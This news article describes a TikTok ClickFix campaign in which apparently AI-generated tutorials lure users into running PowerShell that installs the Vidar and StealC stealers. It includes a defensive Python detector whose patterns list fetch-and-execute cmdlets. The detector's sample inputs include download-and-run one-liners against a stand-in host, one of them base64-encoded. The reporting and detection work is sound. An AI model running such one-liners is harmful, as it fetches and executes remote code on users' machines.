These AI-Generated TikTok Videos Are Tricking People Into Installing Malware

In recent years, TikTok has become a favorite target for scammers and cybercriminals spreading various types of malware, with the latest shadowy campaign promoting instructional videos that trick users into downloading information-stealing software onto their devices via ClickFix attacks.
The scheme, discovered by Trend Micro and reported by Bleeping Computer, directs users to execute commands to activate Windows and Microsoft Office, or premium features in CapCut and Spotify. One video, titled “Boost Your Spotify Experience Instantly — Here’s How!” has nearly half a million views.
These videos appear to be created using artificial intelligence. The software they discuss is legitimate, but the activation steps they describe are not, and following them will ultimately result in users’ devices being infected with the Vidar and StealC malware.
TikTok’s engagement algorithm makes it easy for malicious videos like these to spread. In the past, cybercriminals have used TikTok’s popular “Invisible Challenge” to distribute the WASP Stealer malware, which can steal Discord accounts, passwords, credit cards, and crypto wallets. Fake crypto giveaways hosted on TikTok have used deepfakes of Elon Musk (and threads around SpaceX and Tesla) to trick users into making “activation” deposits using Bitcoin.
How TikTok ClickFix Attacks Work
ClickFix is a social engineering tactic that uses fake error messages or CAPTCHA prompts to trick users into executing a command containing malicious code. Users will see a pop-up notification about a technical issue with instructions to copy and run a command (usually a PowerShell script) to “fix” the problem. The attack most often targets Windows users, but it has also been used on macOS and Linux.
In the current TikTok campaign, tutorial videos ask users to run a PowerShell command that installs the information-stealing malware Vidar or StealC. The former can take screenshots of the desktop and collect data ranging from logins and cookies to credit cards and crypto wallets. The latter targets web browsers and crypto wallets. Once run, the script will download a second PowerShell script, allowing it to automatically run when the device starts. It also saves data in a hidden directory and deletes temporary folders to avoid detection.
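Because the command is typed by the user, detection has to happen on the endpoint, for example by scanning PowerShell command lines from process-creation or script-block logs for a remote fetch combined with string execution. The sketch below is an added example, not code from Trend Micro or from the campaign; the sample command lines and the example.invalid URLs are constructed, and the pattern lists are an assumption about what a download-and-run one-liner looks like, not a complete rule set.

```python
import base64
import re

# Cmdlets, aliases and .NET calls that pull content from a remote host.
FETCH = re.compile(
    r"\b(?:irm|iwr|curl|wget|Invoke-RestMethod|Invoke-WebRequest)\b"
    r"|\bDownload(?:String|Data)\b", re.I)
# Execution of a string as code, the second half of the one-liner.
EXEC = re.compile(r"\b(?:iex|Invoke-Expression)\b", re.I)
URL = re.compile(r"https?://[^\s'\")]+", re.I)
# -EncodedCommand and its common abbreviations, followed by base64.
ENCODED = re.compile(
    r"(?<![\w-])-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded(cmdline):
    """Return the UTF-16LE script hidden behind -EncodedCommand, if any."""
    match = ENCODED.search(cmdline)
    if not match:
        return cmdline
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except ValueError:  # not valid base64 / UTF-16: scan the raw text instead
        return cmdline


def assess(cmdline):
    """Return (flagged, urls): flagged when the command fetches AND executes."""
    text = decode_encoded(cmdline)
    flagged = bool(FETCH.search(text) and EXEC.search(text))
    return flagged, (URL.findall(text) if flagged else [])


# Constructed sample command lines (not taken from the campaign).
_HIDDEN = base64.b64encode(
    "iex (irm https://example.invalid/a)".encode("utf-16-le")).decode()
SAMPLES = [
    'powershell -c "iex (irm https://example.invalid/activate)"',
    r'powershell -NoProfile -Command "Get-ChildItem C:\Users"',
    'powershell -c "iwr https://example.invalid/setup.msi -OutFile setup.msi"',
    f"powershell -NoP -enc {_HIDDEN}",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(assess(line), line[:60])
```

A plain download to disk (the third sample) is deliberately not flagged, which keeps ordinary installer fetches out of the alert queue; the extracted URLs give responders a starting point for blocking and scoping.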
How to Spot Malicious TikTok Videos
Be careful when following tutorial videos served to you on TikTok (as well as unsolicited tech content in general). Check the source and only engage with those that are legitimate, such as those from the developer themselves. You should also look for signs of AI-generated content, which can be used to spread malware widely and quickly. In reality, these tutorials do not embed or deliver malicious code — the scheme relies on social engineering through verbal instructions, making the threat technically more difficult to detect.